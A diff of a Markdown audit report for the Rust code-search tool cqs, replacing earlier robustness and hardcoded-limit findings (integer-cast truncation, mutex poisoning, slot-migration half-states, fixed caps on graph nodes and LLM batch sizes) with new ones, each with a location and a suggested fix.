-- **Description:** The UMAP wire-protocol writes `(n_rows as u32).to_le_bytes()`, `(dim as u32).to_le_bytes()`, `(id_max_len as u32).to_le_bytes()`, `(id_bytes.len() as u16).to_le_bytes()`. `id_bytes.len() > u16::MAX` is checked at line 109 but `n_rows > u32::MAX` and `id_max_len > u32::MAX` are not. `dim` is bounded by model (fine) but `n_rows` is `buffered.len()` where `buffered` grows one entry per chunk from `store.embedding_batches`. A corpus with >4B chunks (unrealistic) silently truncates the row count in the header, causing the Python UMAP script to read fewer bodies than exist, misalign indices, and return wrong coordinates — silent data-corruption path rather than an error. Same pattern for `id_max_len` (max single-chunk-id length; plausible only if caller constructs pathological ids, but still an unchecked narrowing).
-- **Suggested fix:** After line 93 add `anyhow::ensure!(n_rows <= u32::MAX as usize, "UMAP input too many rows: {n_rows} > u32::MAX");` and a matching guard for `id_max_len` next to the `id_bytes.len()` check that already exists.
-
-#### RB-3: `serve/data.rs` negative `line_start` from DB silently clamped to 0 then cast to `u32`
-- **Difficulty:** easy
-- **Location:** `src/serve/data.rs:504`, and identical pattern in neighboring `Node`/`NodeRef` builders (`:787`, `:785-788`, etc.)
-- **Description:** `line_start: r.get::<i64, _>("line_start").max(0) as u32,` — if `line_start` is somehow a negative i64 in the chunks table (corrupted index, migration bug, or a type-tree change), `max(0)` clamps to 0 and emits a "line 0" chunk in the served payload. If it's positive but > `u32::MAX`, the cast silently truncates. On the serve API this manifests as the frontend scrolling to the wrong line when the user clicks a node. No diagnostic.
-- **Suggested fix:** Replace the shape with `let raw: i64 = r.get("line_start"); u32::try_from(raw).map_err(|_| ServeError::Internal(format!("chunk {id} has out-of-range line_start {raw}")))?`. Do the same at every call site (grep `line_start: r.get`). Alternatively emit a `tracing::warn!` with the chunk id and clamp, so stale data doesn't silently break the UI.
-
-#### RB-4: `HierarchyDirection` query-string parsing panics on mixed-case / unicode input? — no: safely handled; skip
-- **Skipped** (falsely suspected).
-
-#### RB-5: `extract_l5k_regions` regex captures `.unwrap()` on group 0/1/2 — panic on concurrent regex corruption
-- **Difficulty:** hard
-- **Location:** `src/parser/l5x.rs:344-346,365`
-- **Description:** `let routine_name = block.get(1).unwrap().as_str().to_string();` / `block.get(2).unwrap()` / `block.get(0).unwrap()`. The regex (`L5K_ROUTINE_BLOCK_RE` at line 323-325) has exactly two capture groups, so on a successful match groups 0, 1, and 2 must be present — this is safe against normal inputs. The only reachable panic is a `regex` crate bug where `captures_iter` yields a match with missing groups. No current evidence of such a bug, but the `.unwrap()` panic path is on user-content-derived input (L5X/L5K files in the indexing pipeline). If a corrupt file were to somehow produce a non-empty match-iterator whose capture layout is surprising, the whole indexer panics mid-walk. This is the only cluster of non-Mutex, non-fixed-size-try-into, non-regex-compile `.unwrap()`s in the production parser path.
-- **Suggested fix:** Defensive — `let Some(routine_name) = block.get(1).map(|m| m.as_str().to_string()) else { tracing::warn!("L5K regex matched but group 1 missing — skipping"); continue; };`. Or accept the tiny risk and document it next to the regex (consistent with the `.expect("valid regex")` pattern used elsewhere). Low-impact, but a panic in the indexer aborts the whole `cqs index` / `cqs watch` pass.
-
-#### RB-6: `chunk_count as usize` on u64→usize cast in CAGRA + CLI — silent truncation on 32-bit
-- **Difficulty:** easy
-- **Location:** `src/cagra.rs:606`, `src/cli/store.rs:344`, `src/cli/commands/index/build.rs:791,827`, `src/cli/commands/index/stats.rs:134,142-163`, `src/serve/data.rs` — widespread pattern
-- **Description:** Many sites do `store.chunk_count()? as usize` where `chunk_count()` returns `u64`. On 32-bit targets this silently truncates at `usize::MAX == u32::MAX`, i.e. 4.3 billion chunks. cqs is 64-bit-only in practice (release targets are Linux x86_64, macOS ARM64, Windows x86_64), but there is no `#[cfg(target_pointer_width = "64")]` gate on the crate, and `cargo build --target i686-unknown-linux-gnu` is still mechanically buildable. Not a reachable panic on supported targets, but a silent wrap on pathological corpora in the (unsupported but buildable) 32-bit case.
-- **Suggested fix:** Either gate the whole crate with `#[cfg_attr(not(target_pointer_width = "64"), compile_error!("cqs requires a 64-bit target"))]` in `src/lib.rs`, or replace the casts with `usize::try_from(chunk_count).map_err(StoreError::from)?`. Given the widespread pattern, the single-line crate-level gate is the cleaner fix.
-
-#### RB-7: Channel `recv()` panics in indexing pipeline aren't routed to structured error
-- **Difficulty:** medium (potentially no issue — verify)
-- **Location:** survey didn't surface any `.recv().unwrap()` / `.send(...).unwrap()` in production — **likely no finding**, but the parallel-rayon pipeline (`src/cli/pipeline/parsing.rs`) uses `crossbeam_channel` with `?` propagation. No panic path confirmed. Skipping.
-- **Suggested fix:** n/a
-
-#### RB-8: `reranker.rs` batch_size × stride multiplication on inference output — no overflow guard
-- **Difficulty:** easy
-- **Location:** `src/reranker.rs:369,378`
-- **Description:**
+- **Location:** `src/slot/mod.rs:207, 323`
+- **Description:** `read_active_slot` and `read_slot_model` use `fs::read_to_string(&path)` to load the active-slot pointer and per-slot config. Both files are owned by cqs and expected to be tiny (≤32 chars for the pointer, ~50 bytes for the model config), but a stray editor swap-file collision, a corrupted disk write, or a hostile co-tenant in a shared `.cqs/` directory can leave a multi-GB file behind. `read_to_string` then attempts to allocate the whole thing, OOM-ing every cqs invocation in that project until the user manually inspects `.cqs/`. Because `read_active_slot` runs on every CLI command (it's the slot-resolution fallback), a single bad pointer file effectively bricks the project for cqs.
+- **Suggested fix:** Read with a hard cap. E.g.:
   ```rust
-  let stride = if shape.len() == 2 { shape[1] as usize } else { 1 };
-  // ...
-  let expected_len = batch_size * stride;
+  use std::io::Read;
+  let mut f = std::fs::File::open(&path)?;
+  let mut buf = String::new();
+  f.take(4096).read_to_string(&mut buf)?;
   ```
-  `shape[1]` is an `i64` from ORT. Cast to `usize` on a negative dimension wraps to a huge positive value (e.g. `-1 as usize = usize::MAX`). `batch_size * stride` then overflows and wraps. The subsequent `data.len() < expected_len` check still passes even on overflow (wrapped `expected_len` small), letting the function proceed with a broken stride. ORT shapes being negative is a spec-violating model but a malicious or corrupted `.onnx` file could have one.
-- **Suggested fix:** After `shape[1] as usize`, add `if shape[1] < 0 { return Err(RerankerError::Inference(format!("negative output dim: {}", shape[1]))); }`. Then replace `batch_size * stride` with `.checked_mul(...)` and return `Inference` on None.
+  4 KiB is enough for `slot.toml` (and 100× headroom on the pointer file); an oversize file becomes "treated as missing" with a `tracing::warn!`. Same pattern at both sites.
 
-#### RB-9: `splade/mod.rs` `shape[N] as usize` on negative ORT dims — same pattern as RB-8
+#### RB-V1.30-3: SystemTime → i64 casts in cache wrap silently after year 2554
 - **Difficulty:** easy
-- **Location:** `src/splade/mod.rs:145,154,524,549,770-838` (multiple)
-- **Description:** Six sites do `shape[N] as usize` on `i64` ORT shape values. Most are bounded by `shape.len() != 2/3` guards and subsequent `ArrayView2::from_shape` / `ArrayView3::from_shape` which would error on a misshape — but the immediate cast still wraps a negative dim silently into `usize::MAX`, then multiplies into `batch_size`/`seq_len`/`vocab` arithmetic *before* the `from_shape` check fires. A malicious SPLADE `.onnx` reports (batch=N, vocab=-1), vocab wraps to `usize::MAX`, `from_shape((batch, usize::MAX))` allocation attempt panics or OOMs the process (ndarray returns `ShapeError` rather than panicking in recent versions — safe — but the pattern is fragile).
-- **Suggested fix:** Factor a helper `fn i64_dim_to_usize(d: i64, name: &str) -> Result<usize, SpladeError>` and use it at every `shape[N] as usize` site.
+- **Location:** `src/cache.rs:349-352, 551-555`
+- **Description:** Both `write_batch` and `prune_older_than` do `SystemTime::now().duration_since(UNIX_EPOCH).unwrap_or_default().as_secs() as i64`. `as_secs()` returns u64 — values above `i64::MAX` (≈ year 2554) wrap to negative and corrupt the `created_at` column / produce a negative cutoff that matches no rows. Latent (we are in 2026), but the `as_secs() as i64` cast pattern is also used elsewhere. None propagate an error — silent wrap is the failure mode.
+- **Suggested fix:** `i64::try_from(secs).map_err(|_| CacheError::Internal("clock above i64 cap"))?` at both sites. Defense-in-depth, the deadline is far away.
 
-#### RB-10: `id_map.len() * dim * 4 * 2` in HNSW persist — unchecked mul on 64-bit (low risk on 32-bit)
+#### RB-V1.30-4: `migrate_legacy_index_to_default_slot` rollback leaves an undetectable half-state
+- **Difficulty:** medium
+- **Location:** `src/slot/mod.rs:511-593`, `move_file` at `:628-638`
+- **Description:** During slot migration, files are moved one by one. On the second-or-later move failing, the function reverses the inventory and tries to move each successful destination back to its original location. A partial rollback prints `tracing::error!("rollback failed (manual recovery may be needed)")` and continues, leaving the project in a half-migrated state where `.cqs/index.db` is missing AND `.cqs/slots/default/index.db` is missing AND `.cqs/active_slot` may or may not exist. The next cqs invocation sees no legacy index, no slots, returns `Ok(false)` from migration, then errors trying to open a Store on the active slot. There is no way to detect "we are mid-failed-migration" from the user side — the recovery error message looks the same as a fresh project missing an index.
+- **Suggested fix:** Write a `.cqs/migration.lock` sentinel file at the start of migration and only remove it on full success; subsequent `migrate_legacy_index_to_default_slot` calls error if the sentinel is found, with a clear `"previous migration failed at $TIME, manually recover then `rm .cqs/migration.lock`"` message. Half-state ambiguity is the actual robustness gap, not the rollback mechanics.
+
+#### RB-V1.30-5: `libc_exdev()` hardcodes 18 — wrong on platforms where EXDEV ≠ 18
 - **Difficulty:** easy
-- **Location:** `src/hnsw/persist.rs:647`
-- **Description:** `let expected_max_data = id_map.len() * dim * std::mem::size_of::<f32>() * 2;` — bounded by `MAX_ID_MAP_ENTRIES = 10_000_000` and `dim` (nominal 1024). `10M × 1024 × 4 × 2 = 8.2 × 10^10` — fits `usize` easily on 64-bit. But the bound `dim` here comes from the loader's `dim` argument (caller-supplied from the Store's `model_info`). A pathological `model_info` with `dim = u32::MAX / 2` would overflow. On 64-bit targets this still fits (within usize), but on 32-bit it overflows silently and the subsequent `data_meta.len() as usize > expected_max_data` check would let a crafted file through.
-- **Suggested fix:** `.checked_mul(dim)?.checked_mul(4)?.checked_mul(2)?` or `saturating_mul` with the same error path as the id_map guard above. Very small fix; defense-in-depth against future corpora with larger embedding dimensions.
+- **Location:** `src/slot/mod.rs:644-647`
+- **Description:** `libc_exdev` returns the literal `18` to avoid a `libc` dependency. Linux/macOS x86_64/ARM64 all use 18, which is what the comment claims. But Windows (also a release target) uses `ERROR_NOT_SAME_DEVICE = 17`, surfaced through Rust's `io::Error::raw_os_error()` as `Some(17)`. Concretely: a user with `.cqs/` on `D:\` and the legacy `index.db` on `C:\` (junction-mounted via Windows) would hit `move_file`'s `fs::rename` with `ERROR_NOT_SAME_DEVICE`, the EXDEV branch wouldn't match (17 ≠ 18), and the migration would propagate the rename error instead of falling through to copy+remove. The user sees a hard migration failure rather than the documented copy fallback. The doc-comment claims "Windows doesn't surface EXDEV the same way (rename across filesystems just succeeds)" but that is undocumented OS behaviour, not a guarantee.
+- **Suggested fix:** Remove the magic-number EXDEV check entirely and fall back to copy+remove on *any* `fs::rename` error after a `fs::metadata().is_some()` check confirming the source file is still readable. Cheaper than getting the constant right per-platform.
 
-Summary: 7 actionable findings (RB-1, RB-2, RB-3, RB-5, RB-6, RB-8, RB-9, RB-10 — 8 total; RB-4 and RB-7 skipped as false positives on deeper inspection). Most of the codebase has extensive saturating-arithmetic, `.ok_or_else` / `.get(i)?` patterns, and `.try_into()` with length guards already in place from prior audit rounds. The remaining issues are all narrow: (a) env-var multiplication overflows that nobody will hit in practice (RB-1); (b) unchecked u64→usize / i64→usize casts that are latent on 32-bit but not on supported 64-bit targets (RB-6, RB-10); (c) ORT shape[N]-as-usize casts that could wrap a negative dim into OOM/panic (RB-8, RB-9) — low probability but worth hardening for the security-critical ONNX surface.
+#### RB-V1.30-6: `cqs cache prune --older-than DAYS` accepts u32, computes negative cutoff for very large DAYS
+- **Difficulty:** easy
+- **Location:** `src/cache.rs:548, 551-555`
+- **Description:** `prune_older_than` takes a `u32 days` and computes `cutoff = now - days * 86400`. `u32::MAX * 86400 = 3.7e14`, well within i64 — but if `now < days * 86400` (days > current-Unix-seconds / 86400 ≈ 22.5k days = ~62 years), `cutoff` wraps negative. SQLite then prunes all entries (everything's `created_at >= 0 > cutoff`). A user typo `cqs cache prune --older-than 999999999` becomes "prune the entire cache silently". No clamp, no warn.
+- **Suggested fix:** Clamp `days` at parse time in the CLI to a sane ceiling (`days.min(36500 /* 100 years */)`), or assert `cutoff >= 0` and refuse the prune with a clear error otherwise.
 
----
+#### RB-V1.30-7: `local.rs` retry loop unwraps Mutex on every 401/403 — poison cascades the worker pool
+- **Difficulty:** medium
+- **Location:** `src/llm/local.rs:393, 394, 396`
+- **Description:** Each retry attempt does `*auth_attempts.lock().unwrap() += 1;` and `*auth_failures.lock().unwrap() += 1;`. If any worker thread panics while holding the mutex (e.g. via the test-only `on_item` callback panic the file mentions, or via a future regression in `parse_choices_content`), the mutex becomes poisoned. Every subsequent worker thread that hits a 401/403 then panics on `.unwrap()`, cascading into a thundering-herd of panicked rayon workers. The batch surface area is `concurrency` ≤ 64 — they all die, the batch fails with no auth-statistics summary, and the rayon thread pool is left in a partially-joined state.
+- **Suggested fix:** Replace `.lock().unwrap()` with explicit poison handling: `*auth_attempts.lock().unwrap_or_else(|p| p.into_inner()) += 1;` — recover from poison and continue counting. The counters are advisory (used to abort the batch when every first-try hit 401/403); a poisoned mutex shouldn't escalate to a panic cascade. Apply at all three sites.
+
+#### RB-V1.30-8: `serve/data.rs` `i64.max(0) as u32` clamp pattern grew from 3 to 8 sites in v1.30
+- **Difficulty:** easy
+- **Location:** `src/serve/data.rs:299, 300, 587, 588, 777, 778, 993, 994` (8 sites post-v1.30)
+- **Description:** `line_start: line_start.max(0) as u32` and matching `line_end` continue to silently clamp DB-corruption / migration-bug `i64` values to `0` then truncate >`u32::MAX` to a low number. v1.30 expanded this pattern to 8 sites (was 3 in v1.29 triage as RB-V1.29-3). The tracking issue is filed but unresolved — the new sites should be folded into the same fix when it lands rather than re-triaged.
+- **Suggested fix:** Defer to RB-V1.29-3's resolution; flag here only because the fix scope grew. When the fix lands, `rg 'max\(0\) as u32' src/serve/data.rs` should return zero hits.
+
+#### RB-V1.30-9: HTTP redirect policy disagrees between production (`Policy::none`) and doctor (`Policy::limited(2)`)
+- **Difficulty:** easy
+- **Location:** `src/llm/local.rs:99` (`Policy::none()`) vs. `src/cli/commands/infra/doctor.rs:578` (`Policy::limited(2)`)
+- **Description:** Same OpenAI-compat endpoint reached two ways: production batches refuse all redirects, doctor allows up to 2. A misconfigured local server that 308-redirects from `http://x/v1` to `https://x/v1` then passes the doctor check (limited(2) follows) but every production batch silently fails (`Policy::none` rejects the redirect). User sees `cqs doctor` green and then `summarize` failing with "all attempts hit network errors" — no diagnostic linking the two. Not a panic path, but a robustness/UX gap where the two probes disagree about what counts as a working endpoint.
+- **Suggested fix:** Align the two policies. `Policy::limited(2)` in both is the safer choice — a same-origin HTTP→HTTPS redirect on bind-localhost is benign. Alternative: leave `Policy::none()` in production but log a once-per-launch warning in doctor when a redirect was followed during the probe, so the user is told their server is misconfigured before they hit it in batch.
+
+#### RB-V1.30-10: Daemon socket-thread join detaches on timeout but doc-comment claims "joined cleanly"
+- **Difficulty:** medium (low impact in practice)
+- **Location:** `src/cli/watch.rs:2374-2400`
+- **Description:** On daemon shutdown the code polls `handle.is_finished()` for up to 5 s, then breaks out of the loop. If the thread is still running at deadline, `handle_opt` is dropped and the OS thread is detached — its memory and any in-flight Store handle are leaked until the process exits (which happens immediately after shutdown, so practically benign), but a wedged socket thread holding a Store mutex would also leak the mutex's poison state in its `Drop` order. Not a correctness bug because the process is exiting, but the surrounding tracing emits "Daemon socket thread joined cleanly" only on the `is_finished()` path — a deadline-exit is silent. Operators reading logs to confirm a clean shutdown can't tell the difference.
+- **Suggested fix:** Add a `tracing::warn!("Daemon socket thread did not exit within 5s; detaching")` log on the deadline-fall-through branch. Optionally, before detaching, force-close the listening socket from outside (`unlink` + `shutdown(2)`) to unblock any `accept()`-blocked socket thread, then re-poll `is_finished()` for another 1 s before detaching.
+
+Summary: 10 v1.30.0-specific findings. RB-V1.30-1, 2, 7 are the highest-impact (all reachable on the new Local LLM provider + slot codepaths). RB-V1.30-4 and 5 are slot-migration robustness — narrow but bricking when they fire. RB-V1.30-3, 6, 8, 9, 10 are defense-in-depth / consistency issues.
+
 
 ## Scaling & Hardcoded Limits
 
-#### [SHL-V1.29-1]: `pad_2d_i64` hardcodes pad-token-id = 0 — breaks non-BERT tokenizers
+#### [SHL-V1.30-1]: CAGRA `itopk_size = (k * 2).clamp(itopk_min, itopk_max)` can produce `itopk_size < k` on small indexes — silent zero-result regression
 - **Difficulty:** medium
-- **Location:** `src/embedder/mod.rs:813-814`
-- **Description:** Code: `let input_ids_arr = pad_2d_i64(&input_ids, max_len, 0);` and `let attention_mask_arr = pad_2d_i64(&attention_mask, max_len, 0);`. The pad token id is hardcoded to `0`. This is correct for BERT-family tokenizers (bert-base, bge-large, e5-base all use `[PAD] = 0`), but RoBERTa/XLM-R use `<pad> = 1`, and custom tokenizers can use any id. The `pad_2d_i64` call assumes `0` unconditionally — a user wiring in a custom RoBERTa-tokenized ONNX via `[embedding] model_path = ...` would silently get padding tokens that the model interprets as `<s>` (start-of-sequence) tokens. Attention mask uses 0 correctly (masked = 0 is universal), but `input_ids` padding is tokenizer-specific. No retrieval of `tokenizer.get_padding().pad_id()` anywhere in the embedder.
-- **Suggested fix:** Add `pad_id: i64` to `ModelConfig` (default 0, override via model registry / config), or read `tokenizer.get_padding().map(|p| p.pad_id).unwrap_or(0)` at session-init and cache on `Embedder`. Thread into `pad_2d_i64` call.
+- **Location:** `src/cagra.rs:359` (computation), `:166-170` (`cagra_itopk_max_default`)
+- **Description:** cuVS CAGRA requires `itopk_size >= k` as a hard constraint — when violated, the call to `params.set_itopk_size(itopk_size)` followed by `Index::search` is the historical cause of the documented `topk=500 > itopk_size=480` failure mode (per `MEMORY.md`: "CAGRA fails at limit≥100 via `topk=500 > itopk_size=480` — keep eval at limit=20"). The current code computes `itopk_size = (k * 2).clamp(itopk_min, itopk_max)` where `itopk_max = (log2(n_vectors) * 32).clamp(128, 4096)`. For a small index (n_vectors = 1000 → itopk_max ≈ 320) and a user request of `k = 500` (e.g., `cqs search --limit 500`), the computation becomes `(1000).clamp(128, 320) = 320 < 500 = k`. The constraint is violated, no guard is present, and the eval-time workaround ("keep eval at limit=20") is the only thing protecting users from this. There is no `if itopk_size < k { fall back to HNSW }` branch, no error to the caller, and no clamp on `k` itself. Anyone wiring `cqs search --rerank --limit 200` (legitimate to give the reranker a 200-candidate pool) on a corpus that hasn't grown past ~13k chunks will silently produce undefined cuVS behavior.
+- **Suggested fix:** Either (a) clamp `itopk_size = itopk_size.max(k)` after the existing clamp, then re-check that the result `<= itopk_max` and degrade to HNSW above that (cleanly returning a typed error from `search_impl`), or (b) clamp `k` itself to `itopk_max - 1` at search-entry and surface a `tracing::warn!` so the caller knows the limit was reduced. A `// CONSTRAINT: itopk_size >= k (cuVS hard requirement)` comment on the constant declaration would prevent regressions during refactors.
 
-#### [SHL-V1.29-2]: `MAX_BATCH_LINE_LEN = 1 MB` hardcoded — blocks large-diff review via batch/daemon
+#### [SHL-V1.30-2]: `nl::generate_nl_with_template` char_budget defaults to 512 even when the active model has `max_seq_length=2048` — nomic-coderank silently truncates at 25% of capacity
 - **Difficulty:** easy
-- **Location:** `src/cli/batch/mod.rs:104`, used at `:1542`
-- **Description:** `const MAX_BATCH_LINE_LEN: usize = 1_048_576;` rejects batch-mode lines above 1 MB with `"Line too long (max 1MB)"`. But the CLI path for `cqs review --stdin` / `cqs affected --stdin` accepts up to `MAX_DIFF_BYTES = 50 MB` (env `CQS_MAX_DIFF_BYTES`). So running the same workflow through the daemon (where the diff is quoted inline to a socket command) caps out 50× sooner than the direct CLI path. No env override. Error message doesn't mention how to bypass. With real-world PR diffs from monorepos easily reaching 5-10 MB, batch users silently hit this before the true limit.
-- **Suggested fix:** Rename to `DEFAULT_MAX_BATCH_LINE_LEN`, add `batch_max_line_len()` reading `CQS_BATCH_MAX_LINE_LEN` (fallback 1 MB). Align the default with `MAX_DIFF_BYTES` or document why they differ. Error message should name the env var.
+- **Location:** `src/nl/mod.rs:222-229`
+- **Description:** Section-chunk NL generation reads `CQS_MAX_SEQ_LENGTH` once into a `OnceLock` with default 512: `let max_seq = *MAX_SEQ.get_or_init(|| std::env::var("CQS_MAX_SEQ_LENGTH").ok().and_then(|v| v.parse().ok()).unwrap_or(512));`. The actual model's `max_seq_length` is encoded in `ModelConfig` (E5/v9-200k/BGE: 512; **nomic-coderank: 2048** per `embedder/models.rs:366`). Switching to nomic-coderank via preset/config without setting `CQS_MAX_SEQ_LENGTH` silently caps the per-section content preview at ~1800 chars instead of ~7800 chars — every section chunk gets truncated to 23% of what the model can accept. The comment at line 220-221 even says "Larger models (8192 → ~32000 chars) get more context", acknowledging the relationship but not wiring it through `ModelConfig`. This is the same "convenience wrapper hardcoded 768-dim while default model was 1024" pattern flagged in `MEMORY.md` as a historical bug.
+- **Suggested fix:** Plumb the active `Embedder`'s `model_config.max_seq_length` into `generate_nl_with_template` (it's currently a free function with no embedder access). Either pass it as an argument from the caller in `pipeline/parsing.rs`, or move section-NL into an `Embedder::generate_nl` method. The env var should be a fallback override, not the source of truth.
 
-#### [SHL-V1.29-3]: `MAX_ID_MAP_SIZE = 100 MB` in `count_vectors` silently breaks large-corpus stats
+#### [SHL-V1.30-3]: `MAX_BATCH_SIZE = 10_000` in LLM module hardcoded — silently truncates summary/HyDE passes on large corpora
 - **Difficulty:** easy
-- **Location:** `src/hnsw/persist.rs:732`
-- **Description:** `const MAX_ID_MAP_SIZE: u64 = 100 * 1024 * 1024; // 100MB` in `count_vectors()`. If the id-map file exceeds 100 MB the function returns `None` silently (warns via `tracing::warn!` but `cqs stats` / health reports just see "unknown vector count"). With BGE-large id strings averaging ~50-60 bytes (e.g. `/long/path/to/file.rs:123:a1b2c3d4e5f6...`), 100 MB caps around ~1.7M chunks — well within the "we want to scale to 1M+" ambition. The hard-load path in `load()` has `MAX_ID_MAP_ENTRIES = 10_000_000` (10M entries) with a rationale; this stats-only path is tighter by an order of magnitude for no clear reason. No env override.
-- **Suggested fix:** Either raise to match the hard-load cap (e.g. `10 * 1024 * 1024 * 1024` — 10 GB), or add `CQS_HNSW_ID_MAP_MAX_BYTES` env var, or compute from the load-path constant. At minimum, bump it; at best, rewrite `count_vectors()` to stream the JSON array count without holding the whole thing in memory.
+- **Location:** `src/llm/mod.rs:192`, used at `summary.rs:58,92`, `hyde.rs:39-41`, `doc_comments.rs:271`
+- **Description:** `const MAX_BATCH_SIZE: usize = 10_000;` is the per-pass cap on Anthropic Batches API submissions. For cqs's own ~17k-chunk corpus this fits in one pass; for any monorepo with >10k callable chunks the user gets a silent truncation — `summary.rs:92-97` does emit a `tracing::info!("Batch size limit reached, submitting partial batch")` but downstream a user must rerun the same `cqs index --improve-docs` or `cqs index --improve-summaries` repeatedly to make progress, with no flag to raise the cap and no visible "X chunks remain unprocessed" hint at CLI exit. Anthropic's actual Batches API hard limit is 100,000 requests per batch — cqs uses 10% of that. No env override, no config section, no CLI flag. With nomic-coderank/CodeRankEmbed enabling much larger corpora to be useful, this becomes a real ceiling. Also note that `hyde.rs:41` also uses this for HyDE expansion which has very different cost characteristics.
+- **Suggested fix:** Move `MAX_BATCH_SIZE` to `src/limits.rs` with an env resolver (`CQS_LLM_MAX_BATCH_SIZE` default 10000, capped at 100000 to honor Anthropic's hard limit). Surface "X chunks remain — rerun to continue" at CLI exit when the cap is hit (today's `tracing::info!` is invisible without `RUST_LOG=info`).
 
-#### [SHL-V1.29-4]: Onboard `MAX_CALLEE_FETCH = 30` / `MAX_CALLER_FETCH = 15` hardcoded, not env-configurable
+#### [SHL-V1.30-4]: `serve::ABS_MAX_GRAPH_NODES = 50_000` and `ABS_MAX_CLUSTER_NODES = 50_000` hardcoded — graph/cluster views silently cap at arbitrary 25% subset of large monorepos
 - **Difficulty:** easy
-- **Location:** `src/onboard.rs:30,33`
-- **Description:** `const MAX_CALLEE_FETCH: usize = 30;` and `const MAX_CALLER_FETCH: usize = 15;`. These caps drop callee/caller content from the onboard reading list silently. For a codebase where a "central concept" (e.g. `parse_config`, `Store::query`) has 50+ callers, the user gets a truncated 15-caller list with no warning, no hint to raise the cap. No env override; no CLI flag; no knob at all. For small projects 15/30 is fine; for large projects / monorepos this is much too low. Contrast with `CALL_GRAPH_MAX_EDGES` which ships with `CQS_CALL_GRAPH_MAX_EDGES` env override.
-- **Suggested fix:** Add `CQS_ONBOARD_MAX_CALLEES` / `CQS_ONBOARD_MAX_CALLERS` env vars, or better yet push them through `OnboardOptions` the way `ScoutOptions` threads `search_limit` / `search_threshold`.
+- **Location:** `src/serve/data.rs:17,24`
+- **Description:** Both `pub(crate) const`. The cluster query (`build_cluster`) sorts by `id ASC LIMIT effective_cap` — at 200k chunks, the cluster view shows 25% of the corpus chosen by id-string lexical order, which is essentially random with respect to topology or coverage. The graph view has the same arbitrary truncation. The comment at line 14-16 ("Prevents a single unauth request from materialising the full chunks table (millions of rows)") is a SEC-3 motivation, but the *value* 50k is a guess, not derived from anything (RAM ceiling, JSON serialization budget, browser rendering capacity). No env override; no config; no `?max_nodes` ceiling for trusted operators. A user running `cqs serve` on a 500k-chunk monorepo opens the graph view and sees an unspecified slice with no warning. Cytoscape's practical render ceiling is around 5k-10k nodes anyway, so 50k is too high for the UI side and too low for a "show me everything" power-user query.
+- **Suggested fix:** Keep the security cap, but add `CQS_SERVE_MAX_GRAPH_NODES` and `CQS_SERVE_MAX_CLUSTER_NODES` env overrides (with a hard ceiling, e.g., `1_000_000`, that even env can't exceed). Better: derive from `chunk_count` so small projects ship the whole graph and large projects ship the top-N by `n_callers_global` (already an indexed column). The graph endpoint also needs a documented "show me a focused subgraph around node X" mode for monorepos.
 
-#### [SHL-V1.29-5]: `task.rs` gather constants (`TASK_GATHER_DEPTH=2`, `TASK_GATHER_MAX_NODES=100`, `TASK_GATHER_LIMIT_MULTIPLIER=3`) hardcoded, no env
+#### [SHL-V1.30-5]: `build_chunk_detail` callers/callees/tests `LIMIT 50/50/20` hardcoded SQL constants — silent truncation in the chunk-detail UI on hot functions
 - **Difficulty:** easy
-- **Location:** `src/task.rs:19-25`
-- **Description:** All three `TASK_GATHER_*` constants are plain module-scope `const` with zero env/config/CLI plumbing. On a small project `max_nodes=100` is generous; on a 1M-chunk corpus the BFS gather phase truncates at 100 nodes and the task brief is tiny regardless of the user's `--limit`. Depth=2 / multiplier=3 are similarly fixed. No tracing warn on cap hit. The sibling `gather::GatherOptions` exposes these to callers, but `task()` ignores that and uses the hardcoded three.
-- **Suggested fix:** Read `CQS_TASK_GATHER_DEPTH` / `CQS_TASK_GATHER_MAX_NODES` / `CQS_TASK_GATHER_LIMIT_MULTIPLIER` (with `OnceLock` caching like the other `CQS_*` helpers). Or plumb through `cmd_task` flags. Or accept a `TaskOptions` struct mirroring `GatherOptions`.
+- **Location:** `src/serve/data.rs:505,542,571`
+- **Description:** Three SQL queries inside `build_chunk_detail` — `callers_rows` (`LIMIT 50`), `callees_rows` (`LIMIT 50`), `tests_rows` (`LIMIT 20`) — pin the chunk-detail sidebar to fixed truncation. A heavily-called function on a large corpus (e.g., `Store::query` with 200+ callers) shows the first 50 by `(origin, line_start)` and silently drops the rest with no "showing 50 of 247" indicator. The 20-test cap is even more painful for popular utilities — `cqs::Embedding::new` may have 100+ test references. No env override, no SQL parameter binding, no JSON `truncated: true` flag in the response. Inconsistent with `build_graph` which honors `max_nodes` from the request.
+- **Suggested fix:** Bind these as `?` parameters (already done via `LIMIT ?` for `build_graph`, just not here), accept `?max_callers` / `?max_callees` / `?max_tests` query params, and emit `truncated: true` in the response when the cap is hit. Source the defaults from `src/limits.rs` so the same value drives the UI, the test, and any future CLI consumer.
 
-#### [SHL-V1.29-6]: `SCOUT_LIMIT_MAX = 50`, `SIMILAR_LIMIT_MAX = 100`, `RELATED_LIMIT_MAX = 50` hardcoded, no env override (unlike siblings in same file)
-- **Difficulty:** easy
-- **Location:** `src/cli/limits.rs:27,32,37`
-- **Description:** Three `LIMIT_MAX` ceilings sit alongside `MAX_DIFF_BYTES`, `MAX_DISPLAY_FILE_SIZE`, `READ_MAX_FILE_SIZE`, `MAX_DAEMON_RESPONSE_BYTES` — every one of those has a resolver function (`max_diff_bytes()`, `max_display_file_size()`, etc.) reading its own `CQS_*` env var. The three `LIMIT_MAX` constants do not. They're re-exported via `src/cli/mod.rs:33` and consumed at 6 call sites (3 CLI, 3 batch). On a large corpus where an agent wants `cqs similar --limit 500` to see the full blast radius of a near-duplicate, it silently clamps to 100 with no warning and no way to override short of editing source. Inconsistent with the rest of the file.
-- **Suggested fix:** Add `scout_limit_max()` / `similar_limit_max()` / `related_limit_max()` reading `CQS_SCOUT_LIMIT_MAX` / `CQS_SIMILAR_LIMIT_MAX` / `CQS_RELATED_LIMIT_MAX`. The `parse_env_usize` helper already exists in the same file.
-
-#### [SHL-V1.29-7]: Health/suggest hotspot thresholds (`HOTSPOT_MIN_CALLERS=5`, `DEAD_CLUSTER_MIN_SIZE=5`, `HEALTH_HOTSPOT_COUNT=5`, `SUGGEST_HOTSPOT_POOL=20`) don't scale with corpus
+#### [SHL-V1.30-6]: `embed_batch_size()` default 64 doesn't scale with model dim or available VRAM — RTX 4060 OOMs while A6000 idles
 - **Difficulty:** medium
-- **Location:** `src/suggest.rs:14,18,21` and `src/health.rs:16`
